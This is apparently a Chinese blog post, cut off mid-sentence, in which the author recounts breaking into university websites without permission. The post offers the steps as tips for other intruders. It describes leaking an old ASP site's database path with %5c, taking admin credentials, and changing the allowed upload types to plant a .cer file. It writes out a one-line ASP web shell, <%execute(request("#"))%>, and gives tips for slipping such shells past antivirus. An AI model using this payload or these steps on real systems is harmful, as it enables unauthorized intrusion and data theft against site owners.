这两天很无聊,趁着放假的时间就准备练习下自己的入侵技术,没有什么目标就准备测试下周围大学网站的安全性,顺便拿网站练练手。大部分这些网站的管理员应该说安全意识都不错的,毕竟都是大学的管理员啊!可是测试结果很不近人意,最后结果都拿到了管理员权限。但是也并不是一帆风顺的,好多时候管理员总是设置些不大不小的障碍,跟人开的玩笑还真有点让人一下子不知道怎么办。这里写出来的意思算就是给各位入侵者一些小小的经验和管理员一点点的提醒吧!
废话少说,我就把入侵中遇到的一些小麻烦组合到一次入侵中吧!现在的网站一般都有防火墙,一些很有钱的大学甚至会有硬件防火墙,所以从开始我就没有打算从正面突破,随便telnet了几个端口在看到长长的延时后就直接转到了web程序方面。看了下网站的应用程序,都是asp版本的,可是看了一会发现有个url管理系统下面的版权所有赫然写着2002-2003!汗,这样的程序一般是漏洞齐全啊!于是找了一个隐藏的url然后直接%5c暴库,得到路径后下载数据库,得到帐号密码后到新闻系统直接进入后台,修改上传类型为可以上传asp文件,然后……(这里是介绍突破管理员的一些设置,就不讲如何入侵了和抓图了,反正大家都很熟悉^_^)。
马上遇到管理员跟我们开的第一个玩笑了,上传的时候明明已经修改为可以上传asp的文件类型,但是就是提示不允许,嘿嘿,没关系,我修改为可以上传cer文件得到上传的木马如图一。于是我兴冲冲的准备写asp木马了,用的是修改了的海洋木马,这里保存为了test.asp文件,但是访问的时候居然是404不存在。汗,有杀毒软件?没关系,呵呵,再保存为cer文件试试,居然还是404!于是又选择保存为gif居然都失败了,include预处理的方法都不行了。于是保存一个内容为<%execute(request("#"))%>的文本文档,再访问的时候过了一段时间居然可以访问,基本确定是很BT的杀毒软件了。不过对<%execute(request("#"))%>内容不过滤那就好办啊,将<%execute(request("#"))%>保存为一个111.asp。哈哈,出来了!用客户端连上去,OK!如图二。避开杀毒软件了。这里,算是管理员设置的一个阻碍吧!这里我看到好多人躲开杀毒软件的办法都是加密的方式,但是还是躲不开一个execute()函数的,如果杀毒软件将这个字符串也列为查杀对象的话,估计还得搞点大小写转换的技巧。还有一种木马是以
例似的形式,后面就是加密或者不加密的代码了,但是还是逃不了那个
阅读(739) | 评论(0) | 转发(0) |